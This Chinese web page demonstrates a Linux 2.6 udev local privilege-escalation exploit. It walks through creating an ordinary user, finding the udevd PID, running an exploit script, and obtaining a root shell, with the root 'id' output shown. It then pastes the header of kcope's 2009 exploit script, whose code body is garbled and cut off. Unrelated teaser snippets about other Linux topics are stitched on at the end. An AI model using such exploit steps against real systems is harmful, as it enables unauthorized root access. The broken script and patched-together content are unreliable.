Linux攻防之udev漏洞演示
此漏洞针对linux2.6内核,只要有普通用户权限,即可提升root权限,开始实验吧 1、复制以下代码,保存为udev.sh,并赋予可执行权限 2、#useradd test //新建一个普通用户 3、#su - test //切换至test用户 4、#ps -ef |grep udev //查看udev id root 474 1 0 Apr09 ? 00:00:00 /sbin/udevd -d 5、#sh udev.sh 473 //执行命令,udevd的id号减1,即473 6、sh-3.2# id uid=0(root) gid=0(root) groups=506(test) 此时test已经提升至root权限 如何修复漏洞,只要升级udev就行了 #yum update udev 附代码: #!/bin/sh # Linux 2.6 # bug found by Sebastian Krahmer # # lame sploit using LD technique # by kcope in 2009 # tested on debian-etch,ubuntu,gentoo # do a 'cat /proc/net/netlink' # and set the first arg to this # script to the pid of the netlink socket # (the pid is udevd_pid - 1 most of the time) # + sploit has to be UNIX formatted text :) # + if it doesn't work the 1st time try more often # # WARNING: maybe needs some FIXUP to work flawlessly ## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang cat > udev.c program.c suid.c
相关文档:
2009 年 4 月 23 日
本文中我们针对 Linux 上多线程编程的主要特性总结出 5 条经验,用以改善 Linux 多线程编程的习惯和避免其中的开发陷阱。在本文中,我们穿插一些 Windows 的编程用例用以对比 Linux 特性,以加深读者印象。
背景
Linux 平台上的多线程程序开发相对应其他平台(比如 Windows)的多线程 API 有一些细微 ......
由于 Linux 良好的用户权限管理体系,病毒往往是 Linux 系统管理员最后才需要考虑的问题。以往,Linux 上的杀毒软件主要是为企业的邮件和文件服务器所设计的。如今,随着 Linux 桌面用户数量的增长,桌面用户在受益于 Linux 系统对病毒较强的天然免疫力的同时,也需要杀毒软件清理从网络或U盘带来的WIndows病毒。尽管那些 ......
经过长时间学习linux库文件的概念,今天小编也给大家搜集了关于库的概念以及作用,希望大家看后会有很多收获。
1.什么是linux库
在windows平台和linux平台下都大量存在着库。本质上来说库是一种可执行代码的二进制形式,可以被操作系统载入内存执行。由于windows和linux的本质不同,因此二者库的二进制是不兼容的。本文仅 ......
在linux下一些常用的关机/重启命令有shutdown、halt、reboot、及init,它们都
可以达到重启系统的目的,但每个命令的内部工作过程是不同的,通过本文的介绍,希
望你可以更加灵活的运用各种关机命令。
1.shutdown
shutdown命令安全地将系统关机。 有些用户会使用直接断掉电源的方式来关闭linux,
......
linux常用头文件如下:
POSIX标准定义的头文件
<dirent.h>
目录项
<fcntl.h> 文件控制
<fnmatch.h> 文件名匹配类型
<glob.h>
路径名模式匹配类型
< ......
